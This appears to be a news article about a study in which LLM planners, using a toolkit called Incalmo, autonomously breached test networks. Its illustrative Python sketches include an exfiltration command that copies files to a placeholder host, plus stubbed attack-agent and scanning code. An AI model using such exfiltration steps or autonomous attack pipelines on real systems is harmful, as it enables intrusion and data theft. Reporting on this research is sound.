New study reveals that language models can execute complex cyberattacks without human intervention
In a groundbreaking study, researchers from Carnegie Mellon University and the artificial intelligence firm Anthropic have demonstrated that large language models (LLMs) can autonomously plan and execute sophisticated cyberattacks. The research, which replicated the 2017 Equifax breach among other attacks, highlights the urgent need for cybersecurity defenses to evolve.
The Equifax breach, which compromised the data of approximately 147 million customers, was chosen for simulation because of the large amount of public information about how it was carried out. For the study, the researchers developed an attack toolkit called Incalmo, which translated the high-level strategy behind the Equifax breach into specific system commands.
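To illustrate the general idea of such a translation layer, here is a minimal sketch, not the researchers' actual code: it assumes a hypothetical mapping from planner-issued action names to concrete command lines, with all names and addresses invented for illustration.

```python
# Hypothetical sketch of a translation layer in the spirit of Incalmo:
# the planner emits a high-level action name, and the layer maps it to a
# concrete command line, so the model never writes raw shell syntax itself.
# Action names and the address below are placeholders, not the real API.

HIGH_LEVEL_ACTIONS = {
    "scan_network": lambda target: ["nmap", "-sV", target],
    # 198.51.100.7 is a reserved documentation address; nothing is executed.
    "exfiltrate_file": lambda path: ["scp", path, "user@198.51.100.7:/loot/"],
}

def translate(action: str, argument: str) -> list[str]:
    """Map a planner-issued action name to an executable command line."""
    try:
        return HIGH_LEVEL_ACTIONS[action](argument)
    except KeyError:
        raise ValueError(f"Planner requested unsupported action: {action}")

if __name__ == "__main__":
    print(translate("scan_network", "10.0.0.0/24"))
    # ['nmap', '-sV', '10.0.0.0/24']
```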
The study employed a hierarchical architecture in which the LLM acted as a strategic planner, issuing high-level instructions, while a combination of LLM and non-LLM agents handled lower-level tasks such as network scanning, vulnerability exploitation, malware installation, and data exfiltration. This division of labor proved highly effective: the AI system compromised 9 of the 10 enterprise-grade network environments tested and achieved near-complete network control in some cases.
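A bare-bones sketch of that hierarchy, under the assumption that tasks are routed by name to specialized agents, might look as follows; the class and function names are illustrative, not the researchers' implementation.

```python
# Minimal sketch of the hierarchical architecture the study describes:
# an LLM "planner" emits high-level tasks, and a dispatcher routes each one
# to a lower-level agent (LLM-backed or plain code). All names are assumed.

from dataclasses import dataclass
from typing import Callable

@dataclass
class Task:
    name: str    # e.g. "scan" or "exploit"
    target: str  # host or subnet chosen by the planner

def scan_agent(task: Task) -> str:
    # Non-LLM agent: would wrap deterministic tooling such as a port scanner.
    return f"scanned {task.target}, found open services"

def exploit_agent(task: Task) -> str:
    # An LLM-backed agent would go here; stubbed out for the sketch.
    return f"attempted exploit against {task.target}"

AGENTS: dict[str, Callable[[Task], str]] = {
    "scan": scan_agent,
    "exploit": exploit_agent,
}

def run_plan(plan: list[Task]) -> None:
    """Execute the planner's high-level tasks via the specialized agents."""
    for task in plan:
        result = AGENTS[task.name](task)
        print(result)  # in the real system, results feed back to the planner

if __name__ == "__main__":
    # The plan would come from the LLM planner; hard-coded here.
    run_plan([Task("scan", "10.0.0.0/24"), Task("exploit", "10.0.0.5")])
```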
The effectiveness of these autonomous attacks raises concerns about the current state of cybersecurity defenses. Traditional models, designed around human attacker behavior, align poorly with AI attackers that operate continuously, maintain perfect memory, and can coordinate simultaneous multi-vector attacks. The resulting gaps in existing enterprise defenses make it crucial for those defenses to evolve.
However, the researchers emphasize that these demonstrations took place in constrained environments and do not represent an immediate existential threat to the internet. They also point to transformative possibilities for cybersecurity defense: AI-driven systems could continuously and autonomously test networks for vulnerabilities, making proactive security testing accessible to smaller organizations.
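As a rough illustration of that defensive vision, and only an assumption about how it might be wired up, the loop below continuously rescans a fixed host list; in the envisioned system an LLM would pick targets and triage the output instead.

```python
# Illustrative only: a bare-bones continuous vulnerability-scan loop of the
# kind the researchers envision AI-driven defenders automating. Requires
# nmap to be installed; the host list and interval are placeholders.

import subprocess
import time

TARGETS = ["10.0.0.5", "10.0.0.6"]  # hypothetical in-scope hosts
SCAN_INTERVAL_SECONDS = 3600        # rescan every hour

def scan(host: str) -> str:
    """Run a basic service/version scan and return nmap's text output."""
    result = subprocess.run(
        ["nmap", "-sV", host], capture_output=True, text=True, check=False
    )
    return result.stdout

while True:
    for host in TARGETS:
        report = scan(host)
        # An autonomous defender would hand `report` to an LLM to triage
        # findings and propose fixes; this sketch just prints it.
        print(report)
    time.sleep(SCAN_INTERVAL_SECONDS)
```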
Brian Singer, the lead researcher and a PhD candidate in Carnegie Mellon's Department of Electrical and Computer Engineering, said the goal was to measure how well large language models can plan and carry out an attack without human assistance. His biggest concern is the speed and low cost with which such an attack could be orchestrated.
Corporate stakeholders are now seeking to better understand the risk calculus of their technology stacks and to answer the lingering question: are we a target? As the threat landscape evolves, organizations must stay vigilant and invest in defensive technologies that can counter AI adversaries operating with unprecedented efficiency and persistence.
Meanwhile, Singer is researching defenses against autonomous attacks, as well as LLM-based autonomous defenders. This ongoing work is a crucial step toward securing digital infrastructure against AI-driven threats.